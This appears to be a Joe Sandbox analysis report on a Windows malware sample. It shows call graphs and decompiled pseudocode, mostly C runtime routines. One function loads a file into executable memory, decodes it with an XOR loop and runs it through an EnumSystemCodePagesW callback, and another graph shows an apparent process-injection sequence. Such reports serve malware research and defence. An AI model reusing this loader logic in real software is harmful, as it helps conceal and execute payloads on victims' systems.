7618 b52c39 ReadConsoleW 7614->7618 7615->7604 7625 b52f46 7616->7625 7627 b52cd9 7616->7627 7616->7628 7619 b53174 7617->7619 7618->7616 7620 b52c5c GetLastError 7618->7620 7622 b51c8f __chsize_nolock 58 API calls 7619->7622 7620->7611 7621->7628 7622->7628 7623->7562 7624 b54831 _free 58 API calls 7624->7623 7625->7628 7633 b5304c ReadFile 7625->7633 7626 b52dc6 7626->7628 7632 b52e73 7626->7632 7635 b52e83 7626->7635 7638 b52e33 MultiByteToWideChar 7626->7638 7627->7626 7630 b52d45 ReadFile 7627->7630 7628->7623 7628->7624 7631 b52d66 GetLastError 7630->7631 7637 b52d70 7630->7637 7631->7637 7634 b51cc3 __cftof_l 58 API calls 7632->7634 7636 b5306f GetLastError 7633->7636 7642 b5307d 7633->7642 7634->7628 7635->7638 7639 b57054 __lseeki64_nolock 60 API calls 7635->7639 7636->7642 7637->7627 7640 b57054 __lseeki64_nolock 60 API calls 7637->7640 7638->7620 7638->7628 7639->7638 7640->7637 7641 b57054 __lseeki64_nolock 60 API calls 7641->7642 7642->7625 7642->7641 7644 b52772 7643->7644 7645 b5275d 7643->7645 7649 b527a7 7644->7649 7654 b5276d 7644->7654 7710 b565a7 7644->7710 7646 b51cc3 __cftof_l 58 API calls 7645->7646 7647 b52762 7646->7647 7648 b51e89 __cftof_l 9 API calls 7647->7648 7648->7654 7651 b52873 __filbuf 58 API calls 7649->7651 7652 b527bb 7651->7652 7677 b52916 7652->7677 7654->7562 7655 b527c2 7655->7654 7656 b52873 __filbuf 58 API calls 7655->7656 7657 b527e5 7656->7657 7657->7654 7658 b52873 __filbuf 58 API calls 7657->7658 7659 b527f1 7658->7659 7659->7654 7660 b52873 __filbuf 58 API calls 7659->7660 7661 b527fe 7660->7661 7662 b52873 __filbuf 58 API calls 7661->7662 7662->7654 7664 b528a6 7663->7664 7668 b528a2 _memmove 7663->7668 7665 b528ad 7664->7665 7670 b528c0 _memset 7664->7670 7666 b51cc3 __cftof_l 58 API calls 7665->7666 7667 b528b2 7666->7667 7669 b51e89 __cftof_l 9 API calls 7667->7669 7668->7562 7669->7668 7670->7668 7671 b528ee 7670->7671 7672 b528f7 7670->7672 7673 b51cc3 __cftof_l 58 API calls 7671->7673 7672->7668 7674 b51cc3 __cftof_l 58 API calls 7672->7674 7675 b528f3 7673->7675 7674->7675 7676 b51e89 __cftof_l 9 API calls 7675->7676 7676->7668 7678 b52922 __freefls@4 7677->7678 7679 b52946 7678->7679 7680 b5292f 7678->7680 7682 b52a0a 7679->7682 7685 b5295a 7679->7685 7681 b51c8f __chsize_nolock 58 API calls 7680->7681 7684 b52934 7681->7684 7683 b51c8f __chsize_nolock 58 API calls 7682->7683 7691 b5297d 7683->7691 7686 b51cc3 __cftof_l 58 API calls 7684->7686 7687 b52985 7685->7687 7688 b52978 7685->7688 7702 b5293b __freefls@4 7686->7702 7689 b529a7 7687->7689 7690 b52992 7687->7690 7692 b51c8f __chsize_nolock 58 API calls 7688->7692 7694 b56c88 ___lock_fhandle 59 API calls 7689->7694 7693 b51c8f __chsize_nolock 58 API calls 7690->7693 7695 b51cc3 __cftof_l 58 API calls 7691->7695 7692->7691 7696 b52997 7693->7696 7697 b529ad 7694->7697 7698 b5299f 7695->7698 7699 b51cc3 __cftof_l 58 API calls 7696->7699 7700 b529c0 7697->7700 7701 b529d3 7697->7701 7704 b51e89 __cftof_l 9 API calls 7698->7704 7699->7698 7703 b52a2a __read_nolock 70 API calls 7700->7703 7705 b51cc3 __cftof_l 58 API calls 7701->7705 7702->7655 7706 b529cc 7703->7706 7704->7702 7707 b529d8 7705->7707 7713 b52a02 7706->7713 7708 b51c8f __chsize_nolock 58 API calls 7707->7708 7708->7706 7711 b548b1 __malloc_crt 58 API calls 7710->7711 7712 b565bc 7711->7712 7712->7649 7716 b5702e LeaveCriticalSection 7713->7716 7715 b52a08 7715->7702 7716->7715 7720 b51932 7717->7720 7719 b517d9 7721 b5193e __freefls@4 7720->7721 7722 b5442f __lock 51 API calls 7721->7722 7723 b51945 7722->7723 7724 b519fe _doexit 7723->7724 7725 b51973 DecodePointer 7723->7725 7740 b51a4c 7724->7740 7725->7724 7727 b5198a DecodePointer 7725->7727 7733 b5199a 7727->7733 7729 b51a5b __freefls@4 7729->7719 7731 b519a7 EncodePointer 7731->7733 7732 b51a43 7734 b51a4c 7732->7734 7735 b517a8 _doexit 3 API calls 7732->7735 7733->7724 7733->7731 7737 b519b7 DecodePointer EncodePointer 7733->7737 7736 b51a59 7734->7736 7745 b54599 LeaveCriticalSection 7734->7745 7735->7734 7736->7719 7739 b519c9 DecodePointer DecodePointer 7737->7739 7739->7733 7741 b51a52 7740->7741 7742 b51a2c 7740->7742 7746 b54599 LeaveCriticalSection 7741->7746 7742->7729 7744 b54599 LeaveCriticalSection 7742->7744 7744->7732 7745->7736 7746->7742 8519 b58bc0 8520 b58bcc __freefls@4 8519->8520 8521 b58c03 __freefls@4 8520->8521 8522 b5442f __lock 58 API calls 8520->8522 8523 b58be0 8522->8523 8524 b573d6 __updatetlocinfoEx_nolock 58 API calls 8523->8524 8525 b58bf0 8524->8525 8527 b58c09 8525->8527 8530 b54599 LeaveCriticalSection 8527->8530 8529 b58c10 8529->8521 8530->8529 8294 b53283 IsProcessorFeaturePresent 8295 b532a9 8294->8295 8296 b5b303 8299 b5b314 8296->8299 8300 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8299->8300 8301 b5b326 8300->8301 8308 b5b791 8301->8308 8303 b5b346 8304 b5b791 __forcdecpt_l 65 API calls 8303->8304 8307 b5b310 8304->8307 8306 b5b332 8306->8303 8313 b5b623 8306->8313 8309 b5b79d 8308->8309 8310 b5b7af 8308->8310 8309->8306 8318 b5b64e 8310->8318 8314 b5b640 8313->8314 8315 b5b62f 8313->8315 8396 b5b5d1 8314->8396 8315->8306 8319 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8318->8319 8320 b5b661 8319->8320 8321 b5b6cd 8320->8321 8322 b5b66d 8320->8322 8323 b5b6eb 8321->8323 8337 b5917b 8321->8337 8329 b5b682 8322->8329 8330 b5c30c 8322->8330 8325 b51cc3 __cftof_l 58 API calls 8323->8325 8327 b5b6f1 8323->8327 8325->8327 8340 b57917 8327->8340 8329->8306 8331 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8330->8331 8332 b5c31e 8331->8332 8333 b5917b __isleadbyte_l 58 API calls 8332->8333 8336 b5c32b 8332->8336 8334 b5c34f 8333->8334 8345 b57a55 8334->8345 8336->8329 8338 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8337->8338 8339 b5918c 8338->8339 8339->8323 8341 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8340->8341 8342 b57928 8341->8342 8367 b57713 8342->8367 8346 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8345->8346 8347 b57a66 8346->8347 8350 b5795d 8347->8350 8351 b57984 MultiByteToWideChar 8350->8351 8352 b57977 8350->8352 8354 b579b0 8351->8354 8362 b579a9 8351->8362 8352->8351 8353 b55770 __cftof_l 6 API calls 8355 b57a51 8353->8355 8356 b579d2 _memset __crtGetStringTypeA_stat 8354->8356 8358 b5114d _malloc 58 API calls 8354->8358 8355->8336 8357 b57a0e MultiByteToWideChar 8356->8357 8356->8362 8359 b57a38 8357->8359 8360 b57a28 GetStringTypeW 8357->8360 8358->8356 8363 b575c3 8359->8363 8360->8359 8362->8353 8364 b575cd 8363->8364 8366 b575de 8363->8366 8365 b54831 _free 58 API calls 8364->8365 8364->8366 8365->8366 8366->8362 8370 b5772c MultiByteToWideChar 8367->8370 8369 b5778b 8371 b55770 __cftof_l 6 API calls 8369->8371 8370->8369 8373 b57792 8370->8373 8374 b57913 8371->8374 8372 b577f1 MultiByteToWideChar 8375 b57858 8372->8375 8376 b5780a 8372->8376 8379 b5114d _malloc 58 API calls 8373->8379 8381 b577ba __crtGetStringTypeA_stat 8373->8381 8374->8329 8378 b575c3 __crtGetStringTypeA_stat 58 API calls 8375->8378 8392 b57659 8376->8392 8378->8369 8379->8381 8380 b5781e 8380->8375 8382 b57834 8380->8382 8383 b57860 8380->8383 8381->8369 8381->8372 8382->8375 8384 b57659 ___crtLCMapStringW LCMapStringW 8382->8384 8387 b5114d _malloc 58 API calls 8383->8387 8390 b57888 __crtGetStringTypeA_stat 8383->8390 8384->8375 8385 b57659 ___crtLCMapStringW LCMapStringW 8386 b578cb 8385->8386 8388 b578f3 8386->8388 8391 b578e5 WideCharToMultiByte 8386->8391 8387->8390 8389 b575c3 __crtGetStringTypeA_stat 58 API calls 8388->8389 8389->8375 8390->8375 8390->8385 8391->8388 8393 b57684 ___crtLCMapStringW 8392->8393 8394 b57669 8392->8394 8395 b5769b LCMapStringW 8393->8395 8394->8380 8395->8380 8397 b54bfc _LocaleUpdate::_LocaleUpdate 58 API calls 8396->8397 8398 b5b5e2 8397->8398 8399 b5c30c __isctype_l 61 API calls 8398->8399 8400 b5b5f9 8398->8400 8399->8400 8400->8306 8531 b51ec9 8532 b51ed1 8531->8532 8533 b54869 __calloc_crt 58 API calls 8532->8533 8534 b51eeb 8533->8534 8535 b51f04 8534->8535 8536 b54869 __calloc_crt 58 API calls 8534->8536 8536->8535

          Control-flow Graph

          APIs
          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001109D1
          Memory Dump Source
          • Source File: 00000005.00000002.972498932.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_110000_idcqz.jbxd
          Similarity
          • API ID: CreateFile
          • String ID:
          • API String ID: 823142352-0
          • Opcode ID: 9103d7a314f1b309b8927f27c8bda906b513836b8576f471a739e17504b2bec8
          • Instruction ID: 8eb329ec4fc5c63c17c6919774656cfcbde7478ad832a38307eac2a41d7ffc2a
          • Opcode Fuzzy Hash: 9103d7a314f1b309b8927f27c8bda906b513836b8576f471a739e17504b2bec8
          • Instruction Fuzzy Hash: E0713E35E50348EADF55DBE4E852BEDB7B5AF88710F20442AE508EB2E0D7B11A81DB05
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 40 b512be-b512d7 41 b512f4 40->41 42 b512d9-b512de 40->42 44 b512f6-b512fc 41->44 42->41 43 b512e0-b512e2 42->43 45 b512e4-b512e9 call b51cc3 43->45 46 b512fd-b51302 43->46 58 b512ef call b51e89 45->58 48 b51304-b5130e 46->48 49 b51310-b51314 46->49 48->49 51 b51334-b51343 48->51 52 b51324-b51326 49->52 53 b51316-b51321 call b51530 49->53 56 b51345-b51348 51->56 57 b5134a 51->57 52->45 55 b51328-b51332 52->55 53->52 55->45 55->51 60 b5134f-b51354 56->60 57->60 58->41 62 b5143d-b51440 60->62 63 b5135a-b51361 60->63 62->44 64 b51363-b5136b 63->64 65 b513a2-b513a4 63->65 64->65 68 b5136d 64->68 66 b513a6-b513a8 65->66 67 b5140e-b5140f call b52752 65->67 69 b513cc-b513d7 66->69 70 b513aa-b513b2 66->70 77 b51414-b51418 67->77 72 b51373-b51375 68->72 73 b5146b 68->73 78 b513d9 69->78 79 b513db-b513de 69->79 75 b513b4-b513c0 70->75 76 b513c2-b513c6 70->76 80 b51377-b51379 72->80 81 b5137c-b51381 72->81 74 b5146f-b51478 73->74 74->44 82 b513c8-b513ca 75->82 76->82 77->74 83 b5141a-b5141f 77->83 78->79 84 b51445-b51449 79->84 85 b513e0-b513ec call b52873 call b52a2a 79->85 80->81 81->84 86 b51387-b513a0 call b52897 81->86 82->79 83->84 87 b51421-b51432 83->87 88 b5145b-b51466 call b51cc3 84->88 89 b5144b-b51458 call b51530 84->89 101 b513f1-b513f6 85->101 97 b51403-b5140c 86->97 93 b51435-b51437 87->93 88->58 89->88 93->62 93->63 97->93 102 b5147d-b51481 101->102 103 b513fc-b513ff 101->103 102->74 103->73 104 b51401 103->104 104->97
          C-Code - Quality: 69%
          			E00B512BE(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
          				char* _v8;
          				signed int _v12;
          				signed int _v16;
          				signed int _v20;
          				void* __ebx;
          				void* __esi;
          				signed int _t74;
          				signed int _t78;
          				char _t81;
          				signed int _t86;
          				signed int _t88;
          				signed int _t91;
          				signed int _t94;
          				signed int _t97;
          				signed int _t98;
          				char* _t99;
          				signed int _t100;
          				signed int _t102;
          				signed int _t103;
          				signed int _t104;
          				char* _t110;
          				signed int _t113;
          				signed int _t117;
          				signed int _t119;
          				void* _t120;
          
          				_t99 = _a4;
          				_t74 = _a8;
          				_v8 = _t99;
          				_v12 = _t74;
          				if(_a12 == 0) {
          					L5:
          					return 0;
          				}
          				_t97 = _a16;
          				if(_t97 == 0) {
          					goto L5;
          				}
          				if(_t99 != 0) {
          					_t119 = _a20;
          					__eflags = _t119;
          					if(_t119 == 0) {
          						L9:
          						__eflags = _a8 - 0xffffffff;
          						if(_a8 != 0xffffffff) {
          							_t74 = E00B51530(_t99, 0, _a8);
          							_t120 = _t120 + 0xc;
          						}
          						__eflags = _t119;
          						if(_t119 == 0) {
          							goto L3;
          						} else {
          							_t78 = _t74 | 0xffffffff;
          							__eflags = _t97 - _t78 / _a12;
          							if(_t97 > _t78 / _a12) {
          								goto L3;
          							}
          							L13:
          							_t117 = _a12 * _t97;
          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
          							_t98 = _t117;
          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
          								_t100 = 0x1000;
          							} else {
          								_t100 =  *(_t119 + 0x18);
          							}
          							_v16 = _t100;
          							__eflags = _t117;
          							if(_t117 == 0) {
          								L41:
          								return _a16;
          							} else {
          								do {
          									__eflags =  *(_t119 + 0xc) & 0x0000010c;
          									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
          										L24:
          										__eflags = _t98 - _t100;
          										if(_t98 < _t100) {
          											_t81 = E00B52752(_t98, _t119, _t119); // executed
          											__eflags = _t81 - 0xffffffff;
          											if(_t81 == 0xffffffff) {
          												L46:
          												return (_t117 - _t98) / _a12;
          											}
          											_t102 = _v12;
          											__eflags = _t102;
          											if(_t102 == 0) {
          												L42:
          												__eflags = _a8 - 0xffffffff;
          												if(_a8 != 0xffffffff) {
          													E00B51530(_a4, 0, _a8);
          												}
          												 *((intOrPtr*)(E00B51CC3())) = 0x22;
          												L4:
          												E00B51E89();
          												goto L5;
          											}
          											_t110 = _v8;
          											 *_t110 = _t81;
          											_t98 = _t98 - 1;
          											_v8 = _t110 + 1;
          											_t103 = _t102 - 1;
          											__eflags = _t103;
          											_v12 = _t103;
          											_t100 =  *(_t119 + 0x18);
          											_v16 = _t100;
          											goto L40;
          										}
          										__eflags = _t100;
          										if(_t100 == 0) {
          											_t86 = 0x7fffffff;
          											__eflags = _t98 - 0x7fffffff;
          											if(_t98 <= 0x7fffffff) {
          												_t86 = _t98;
          											}
          										} else {
          											__eflags = _t98 - 0x7fffffff;
          											if(_t98 <= 0x7fffffff) {
          												_t44 = _t98 % _t100;
          												__eflags = _t44;
          												_t113 = _t44;
          												_t91 = _t98;
          											} else {
          												_t113 = 0x7fffffff % _t100;
          												_t91 = 0x7fffffff;
          											}
          											_t86 = _t91 - _t113;
          										}
          										__eflags = _t86 - _v12;
          										if(_t86 > _v12) {
          											goto L42;
          										} else {
          											_push(_t86);
          											_push(_v8);
          											_push(E00B52873(_t119)); // executed
          											_t88 = E00B52A2A(); // executed
          											_t120 = _t120 + 0xc;
          											__eflags = _t88;
          											if(_t88 == 0) {
          												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
          												goto L46;
          											}
          											__eflags = _t88 - 0xffffffff;
          											if(_t88 == 0xffffffff) {
          												L45:
          												_t64 = _t119 + 0xc;
          												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
          												__eflags =  *_t64;
          												goto L46;
          											}
          											_t98 = _t98 - _t88;
          											__eflags = _t98;
          											L36:
          											_v8 = _v8 + _t88;
          											_v12 = _v12 - _t88;
          											_t100 = _v16;
          											goto L40;
          										}
          									}
          									_t94 =  *(_t119 + 4);
          									_v20 = _t94;
          									__eflags = _t94;
          									if(__eflags == 0) {
          										goto L24;
          									}
          									if(__eflags < 0) {
          										goto L45;
          									}
          									__eflags = _t98 - _t94;
          									if(_t98 < _t94) {
          										_t94 = _t98;
          										_v20 = _t98;
          									}
          									_t104 = _v12;
          									__eflags = _t94 - _t104;
          									if(_t94 > _t104) {
          										goto L42;
          									} else {
          										E00B52897(_v8, _t104,  *_t119, _t94);
          										_t88 = _v20;
          										_t120 = _t120 + 0x10;
          										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
          										_t98 = _t98 - _t88;
          										 *_t119 =  *_t119 + _t88;
          										goto L36;
          									}
          									L40:
          									__eflags = _t98;
          								} while (_t98 != 0);
          								goto L41;
          							}
          						}
          					}
          					_t74 = (_t74 | 0xffffffff) / _a12;
          					__eflags = _t97 - _t74;
          					if(_t97 <= _t74) {
          						goto L13;
          					}
          					goto L9;
          				}
          				L3:
          				 *((intOrPtr*)(E00B51CC3())) = 0x16;
          				goto L4;
          			}




























          0x00b512c8
          0x00b512cb
          0x00b512d1
          0x00b512d4
          0x00b512d7
          0x00b512f4
          0x00000000
          0x00b512f4
          0x00b512d9
          0x00b512de
          0x00000000
          0x00000000
          0x00b512e2
          0x00b512fd
          0x00b51300
          0x00b51302
          0x00b51310
          0x00b51310
          0x00b51314
          0x00b5131c
          0x00b51321
          0x00b51321
          0x00b51324
          0x00b51326
          0x00000000
          0x00b51328
          0x00b51328
          0x00b51330
          0x00b51332
          0x00000000
          0x00000000
          0x00b51334
          0x00b51337
          0x00b5133a
          0x00b51341
          0x00b51343
          0x00b5134a
          0x00b51345
          0x00b51345
          0x00b51345
          0x00b5134f
          0x00b51352
          0x00b51354
          0x00b5143d
          0x00000000
          0x00b5135a
          0x00b5135a
          0x00b5135a
          0x00b51361
          0x00b513a2
          0x00b513a2
          0x00b513a4
          0x00b5140f
          0x00b51415
          0x00b51418
          0x00b5146f
          0x00000000
          0x00b51475
          0x00b5141a
          0x00b5141d
          0x00b5141f
          0x00b51445
          0x00b51445
          0x00b51449
          0x00b51453
          0x00b51458
          0x00b51460
          0x00b512ef
          0x00b512ef
          0x00000000
          0x00b512ef
          0x00b51421
          0x00b51424
          0x00b51427
          0x00b51428
          0x00b5142b
          0x00b5142b
          0x00b5142c
          0x00b5142f
          0x00b51432
          0x00000000
          0x00b51432
          0x00b513a6
          0x00b513a8
          0x00b513cc
          0x00b513d1
          0x00b513d7
          0x00b513d9
          0x00b513d9
          0x00b513aa
          0x00b513ac
          0x00b513b2
          0x00b513c4
          0x00b513c4
          0x00b513c4
          0x00b513c6
          0x00b513b4
          0x00b513b9
          0x00b513bb
          0x00b513bb
          0x00b513c8
          0x00b513c8
          0x00b513db
          0x00b513de
          0x00000000
          0x00b513e0
          0x00b513e0
          0x00b513e1
          0x00b513eb
          0x00b513ec
          0x00b513f1
          0x00b513f4
          0x00b513f6
          0x00b5147d
          0x00000000
          0x00b5147d
          0x00b513fc
          0x00b513ff
          0x00b5146b
          0x00b5146b
          0x00b5146b
          0x00b5146b
          0x00000000
          0x00b5146b
          0x00b51401
          0x00b51401
          0x00b51403
          0x00b51403
          0x00b51406
          0x00b51409
          0x00000000
          0x00b51409
          0x00b513de
          0x00b51363
          0x00b51366
          0x00b51369
          0x00b5136b
          0x00000000
          0x00000000
          0x00b5136d
          0x00000000
          0x00000000
          0x00b51373
          0x00b51375
          0x00b51377
          0x00b51379
          0x00b51379
          0x00b5137c
          0x00b5137f
          0x00b51381
          0x00000000
          0x00b51387
          0x00b5138e
          0x00b51393
          0x00b51396
          0x00b51399
          0x00b5139c
          0x00b5139e
          0x00000000
          0x00b5139e
          0x00b51435
          0x00b51435
          0x00b51435
          0x00000000
          0x00b5135a
          0x00b51354
          0x00b51326
          0x00b51309
          0x00b5130c
          0x00b5130e
          0x00000000
          0x00000000
          0x00000000
          0x00b5130e
          0x00b512e4
          0x00b512e9
          0x00000000

          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
          • String ID:
          • API String ID: 1559183368-0
          • Opcode ID: 8dff333eff32fbcb5d7ca045d19a5a5e2e1b0a961703b03a2e899086fe8ef1a3
          • Instruction ID: 344614066f7f4b830ea4558ea7495ac11c76555f446b444b512b197da8e050da
          • Opcode Fuzzy Hash: 8dff333eff32fbcb5d7ca045d19a5a5e2e1b0a961703b03a2e899086fe8ef1a3
          • Instruction Fuzzy Hash: 8151C030A00205ABDB249FAD88907AE77E5EF40322F248FE9EC25966D0D7B19D598F44
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 105 b51000-b51055 call b5114d call b511df VirtualAlloc call b51483 112 b51057-b51067 call b51530 105->112 113 b5108a-b51090 105->113 116 b5106a-b5107f 112->116 116->116 117 b51081-b51084 EnumSystemCodePagesW 116->117 117->113
          C-Code - Quality: 92%
          			E00B51000(void* __ecx, void* __eflags, intOrPtr _a12) {
          				intOrPtr _v8;
          				void* __ebx;
          				void* __edi;
          				intOrPtr _t6;
          				void* _t7;
          				_Unknown_base(*)()* _t8;
          				void* _t21;
          				_Unknown_base(*)()* _t22;
          				void* _t27;
          				void* _t28;
          				void* _t29;
          				intOrPtr* _t35;
          
          				_push(_t21);
          				_t29 = 0; // executed
          				_t6 = E00B5114D(_t21, _t27, 0, 0x17d78400); // executed
          				 *_t35 = 0xb63000;
          				_v8 = _t6;
          				_t7 = E00B511DF(_a12, _t28); // executed
          				_t8 = VirtualAlloc(0, 0x152a, 0x3000, 0x40); // executed
          				_t22 = _t8;
          				E00B51483(_t22, 0x152a, 1, _t7); // executed
          				_t10 = _v8;
          				if(_v8 != 0) {
          					E00B51530(_t10, 0xcb, 0x17d78400);
          					do {
          						 *(_t22 + _t29) = ((( *(_t22 + _t29) ^ 0x00000050) + 0x0000004d ^ 0x0000008d) + 0x00000001 ^ 0x0000007c) - 0x27;
          						_t29 = _t29 + 1;
          					} while (_t29 < 0x152a);
          					EnumSystemCodePagesW(_t22, 0); // executed
          				}
          				return 0;
          			}















          0x00b51004
          0x00b5100c
          0x00b5100e
          0x00b51013
          0x00b5101d
          0x00b51020
          0x00b51036
          0x00b51044
          0x00b51048
          0x00b5104d
          0x00b51055
          0x00b51062
          0x00b5106a
          0x00b51079
          0x00b5107c
          0x00b5107d
          0x00b51084
          0x00b51084
          0x00b51090

          APIs
          • _malloc.LIBCMT ref: 00B5100E
            • Part of subcall function 00B5114D: __FF_MSGBANNER.LIBCMT ref: 00B51164
            • Part of subcall function 00B5114D: __NMSG_WRITE.LIBCMT ref: 00B5116B
            • Part of subcall function 00B5114D: RtlAllocateHeap.NTDLL(00510000,00000000,00000001,00000000,00000000,00000000,?,00B548C7,00000000,00000000,00000000,00000000,?,00B544F9,00000018,00B62280), ref: 00B51190
            • Part of subcall function 00B511DF: __wfsopen.LIBCMT ref: 00B511EA
          • VirtualAlloc.KERNELBASE(00000000,0000152A,00003000,00000040), ref: 00B51036
          • __fread_nolock.LIBCMT ref: 00B51048
          • _memset.LIBCMT ref: 00B51062
          • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00B51084
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
          • String ID:
          • API String ID: 3693343133-0
          • Opcode ID: 9770f18853a331a3fd2f9763fdb61f6c31d32c871e34689a1833ab97c91ebfa1
          • Instruction ID: 40c8b138034f0c7adee4a2c091c225e5f2aa086c7b907f89960a9c1c45c7bd46
          • Opcode Fuzzy Hash: 9770f18853a331a3fd2f9763fdb61f6c31d32c871e34689a1833ab97c91ebfa1
          • Instruction Fuzzy Hash: 7401FC72504344BBEB102B79AC4BF9B3BD8DB51756F1418D1FD056B1C2E6B499064274
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 118 111261-11130f call 1106f7 call 1107a4 * 7 135 111312-111316 118->135 136 111318-11132c 135->136 137 11132e-11133b 135->137 136->135 138 11133e-111342 137->138 139 111344-111358 138->139 140 11135a-111376 138->140 139->138 142 111380-1113aa CreateProcessW 140->142 143 111378-11137b 140->143 146 1113b4-1113cd 142->146 147 1113ac-1113af 142->147 144 111523-111524 143->144 149 1113d7-1113f1 ReadProcessMemory 146->149 150 1113cf-1113d2 146->150 147->144 151 1113f3-1113f6 149->151 152 1113fb-111404 149->152 150->144 151->144 153 111406-111415 152->153 154 11142e-11144e VirtualAllocEx 152->154 153->154 155 111417-111424 call 110360 153->155 156 111450-111453 154->156 157 111458-111470 call 110261 154->157 155->154 164 111426-111429 155->164 156->144 162 111472-111475 157->162 163 11147a-11147e 157->163 162->144 165 111487-111491 163->165 164->144 166 111493-1114c6 call 110261 165->166 167 1114c8-1114e4 call 110261 165->167 166->165 173 1114e6-1114e9 167->173 174 1114eb-111509 167->174 173->144 176 111510-11151a call 1101b2 174->176 177 11150b-11150e 174->177 180 111521 176->180 181 11151c-11151f 176->181 177->144 180->144 181->144
          APIs
          • CreateProcessW.KERNEL32(?,00000000), ref: 001113A5
          Strings
          Memory Dump Source
          • Source File: 00000005.00000002.972498932.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_110000_idcqz.jbxd
          Similarity
          • API ID: CreateProcess
          • String ID: D
          • API String ID: 963392458-2746444292
          • Opcode ID: 8c4a45f37e14942ff15c9878dca4783f39f837971a5654e3cb4f8d802ca8c15f
          • Instruction ID: 3e6dd8cd392a1293cf6a4acdf79544c36bdf5196c766f347fa0a58c2e699d413
          • Opcode Fuzzy Hash: 8c4a45f37e14942ff15c9878dca4783f39f837971a5654e3cb4f8d802ca8c15f
          • Instruction Fuzzy Hash: C7A1E271E04109EFDF99DBA4C981BEDBBB5BF48304F204065E616EB251D770AA81DF10
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 182 b5149e-b514b2 call b52400 185 b514e5 182->185 186 b514b4-b514b7 182->186 188 b514e7-b514ec call b52445 185->188 186->185 187 b514b9-b514be 186->187 189 b514c0-b514c4 187->189 190 b514ed-b51504 call b51f5e call b512be 187->190 192 b514d5-b514e0 call b51cc3 call b51e89 189->192 193 b514c6-b514d2 call b51530 189->193 202 b51509-b5151f call b51527 190->202 192->185 193->192 202->188
          C-Code - Quality: 89%
          			E00B5149E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
          				intOrPtr _t16;
          				intOrPtr _t19;
          				intOrPtr _t29;
          				void* _t32;
          
          				_push(0xc);
          				_push(0xb62170);
          				E00B52400(__ebx, __edi, __esi);
          				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
          				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
          					L6:
          					_t16 = 0;
          				} else {
          					_t31 =  *((intOrPtr*)(_t32 + 0x18));
          					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
          						E00B51F5E(_t31);
          						 *((intOrPtr*)(_t32 - 4)) = 0;
          						_t19 = E00B512BE( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
          						_t29 = _t19;
          						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
          						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
          						E00B51527(_t31);
          						_t16 = _t29;
          					} else {
          						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
          							E00B51530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
          						}
          						 *((intOrPtr*)(E00B51CC3())) = 0x16;
          						E00B51E89();
          						goto L6;
          					}
          				}
          				return E00B52445(_t16);
          			}







          0x00b5149e
          0x00b514a0
          0x00b514a5
          0x00b514ac
          0x00b514b2
          0x00b514e5
          0x00b514e5
          0x00b514b9
          0x00b514b9
          0x00b514be
          0x00b514ee
          0x00b514f4
          0x00b51504
          0x00b5150c
